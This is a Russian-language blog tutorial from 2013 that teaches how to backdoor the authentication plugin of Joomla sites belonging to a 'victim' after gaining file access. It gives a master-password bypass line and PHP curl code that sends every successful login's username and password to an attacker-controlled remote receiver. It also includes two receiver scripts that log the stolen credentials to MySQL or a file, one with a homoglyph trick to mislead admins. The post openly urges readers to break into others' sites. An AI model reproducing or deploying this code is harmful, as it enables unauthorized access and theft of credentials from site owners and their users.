---
layout: post
title: Взломать пароль Joomla
image: /images/joomla-cross-scripting-magic.jpg
date: '2013-10-01 14:27:36 +0400'
date_gmt: '2013-10-01 10:27:36 +0400'
categories:
- uroki
---
Доброго времени суток, дорогие читатели! В сегодняшнем уроке я расскажу как **взломать пароль Joomla** (**любой версии**) имея доступ к файловой системе.

Для того, чтобы **взломать пароль Joomla** нам понадобиться:

1.  Прямые руки (две штуки)
2.  Доступ к файловой системе "жертвы"
    *   Подойдет шелл...
    *   ...или cross scripting...
    *   ...или даже доступ к любому плагину для работы с файлами в Joomla! "жертвы"
3.  Любой хостинг с php (**обязательно**) и mysql (опционально) доступный из внешки

Первым делом нужно проверить какая версия Joomla стоит у "жертвы". Для этого открываем папку `~/plugins/authentication/joomla/`, если папка существует, значит у нас версия 2.5 или 3, но если папки нет, то версия 1.5. Для тех, кто не понял: тильда `~` означает корень папки Joomla.

Теперь из нашей текущей точки входа в систему нужно выполнить одно действие (если у вас есть доступ к файл менеджеру, этого делать не нужно):

Установим замечательный файл менеджер, который подойдет для этой задачи (**взлом**а **пароля Joomla**) на все 100%. Скачаем [PHP File Manager](http://prdownloads.sourceforge.net/phpfm/phpFileManager-0.9.7.zip?download "PHP File Manager - Source Forge") (просто и понятно :)). Он довольно **простой** и главное **легкий** (один файл весом в **230кб)**.

Теперь все зависит от вашего метода "проникновения" в систему. Надеюсь сами справитесь :)

Итак, у нас есть файл менеджер. Теперь придется разделиться. У кого версия 2.5 или 3 читает дальше. У кого 1.5 листает ниже.

## Взломать пароль Joomla 2.5 и 3

Итак, у Вас версия 2.5 или 3, есть доступ к файл менеджеру и прямые руки. Продолжим ~~насилие~~:

Откроем файл `~/plugins/authentication/joomla/joomla.php` и перейдем на строку 59.

<span class="image fit">
![Взломать пароль Joomla - Joomla.php]({{ "/images/joomla-php_orig.png" | absolute_url }})
</span>

Если вам просто нужно войти через чей то аккаунт, то заменяем строку 59 полностью:

```php
if ($crypt == $testcrypt || $credentials['password'] == 'auth-me-please') {
```

Теперь вместо пароля, Вам нужно просто "вежливо" попросить Joomla, и она сделает всю работу за Вас!

<span class="image fit">
![Взломать пароль Joomla - auth-me-please]({{ "/images/joomla-auth-me-please.png" | absolute_url }})
</span>

А теперь рассмотрим другой вариант. Таким образом мы сможем получить расшифрованный пароль администратора (и не только).

В том же файле до линии 69 вставляем:

```php
<?php
if ($curl = curl_init()) {
    curl_setopt($curl, CURLOPT_URL, 'http://_ПУТЬ К_/receiver.php');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "login=" . implode("&pass=", $credentials) . "&domain=_ПОМЕТКА_");
    $out = curl_exec($curl);
    curl_close($curl);
}
```

Меняем `_ПУТЬ К_` на адрес вашей папки с файлом `receiver.php` (о нем расскажу чуть позже) и делаем пометку для домена вместо `_ПОМЕТКА_`.

Что делает скрипт? При удачном входе в систему отправляет на наш сервер логин и пароль "жертвы".

Теперь можно сделать такой скрипт и для старой версии...

## Взломать пароль Joomla 1.5

Откроем файл `~/plugins/authentication/joomla.php` и перейдем на строку 55.

<span class="image fit">
![Взломать пароль Joomla - Joomla.php 1.5]({{ "/images/joomla-php_orig_1.5.png" | absolute_url }})
</span>

Файл внешне похож на новую версию, а вот действия вовсе не отличаются.

Меняем 88 строку:

```php
if ($crypt == $testcrypt || $credentials['password'] == 'auth-me-please') {
```

И вставляем перед 98:

```php
<?php
if ($curl = curl_init()) {
    curl_setopt($curl, CURLOPT_URL, 'http://_ПУТЬ К_/receiver.php');
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, "login=" . implode("&pass=", $credentials) . "&domain=_ПОМЕТКА_");
    $out = curl_exec($curl);
    curl_close($curl);
}
```

<span class="image fit">
![Взломать пароль Joomla 1.5 - auth-me-please]({{ "/images/joomla_1.5-auth-me-please.png" | absolute_url }})
</span>

Готово!

### Серверная часть

Теперь дело осталось за малым, написать приемник наших логинов и паролей. На хостинге создадим файл `receiver.php`. Если есть MySQL, то вставляем (не забудьте изменить логин, пароль и базу):

```php
<?php
if ($_POST["login"] && $_POST["pass"]) {
    $db = @mysql_connect("localhost", "_ЛОГИН БД_", "_ПАРОЛЬ БД_");
    @mysql_select_db("_НАЗВАНИЕ БД_", $db);
    $sql = 'INSERT INTO credentials(username, password, domain)
VALUES("' . $_POST["login"] . '","' . $_POST["pass"] . '","' . $_POST["domain"] . '")';
    @mysql_query($sql);
}
else {
    header("Location: http://_ПУТЬ К_/reсeiver.php");
}
```

Вангую: спросите зачем `header();` с тем же именем файла? Отвечу: вместо английской `c` русская `с`. Защита от админо-идиотов.

### Серверная часть без MySQL

Если у кого то нет MySQL, то этот раздел специально для таких людей.

Создаем файл `receiver.php` и вставляем в него код:

```php
<?php
$filename = "joomla.txt";

if (is_writable($filename) && $_POST["login"] && $_POST["pass"]) {
    if (!$handle = fopen($filename, "a")) {
        header("Location: http://_ПУТЬ К_/reсeiver.php");
        exit();
    }

    if (fwrite($handle, $_POST["login"] . ":" . $_POST["pass"] . ":" . $_POST["domain"] . "\n") === FALSE) {
        header("Location: http://_ПУТЬ К_/reсeiver.php");
        exit();
    }

    fclose($handle);
    exit();
}
else {
    header("Location: http://_ПУТЬ К_/reсeiver.php");
    exit();
}
```

Готово! Теперь можно хвастаться всем подряд, и ломать чужие сайты :)

[Версия для тех, кто не любит быдлокод или слишком ленив]({{ "/files/joomla-pass-lesson.zip" | absolute_url }})

Спасибо за внимание, с Вами был Yurijmi, надеюсь вам понравилось. Пишите в комментарии, какие уроки вы хотите увидеть в моем исполнении.
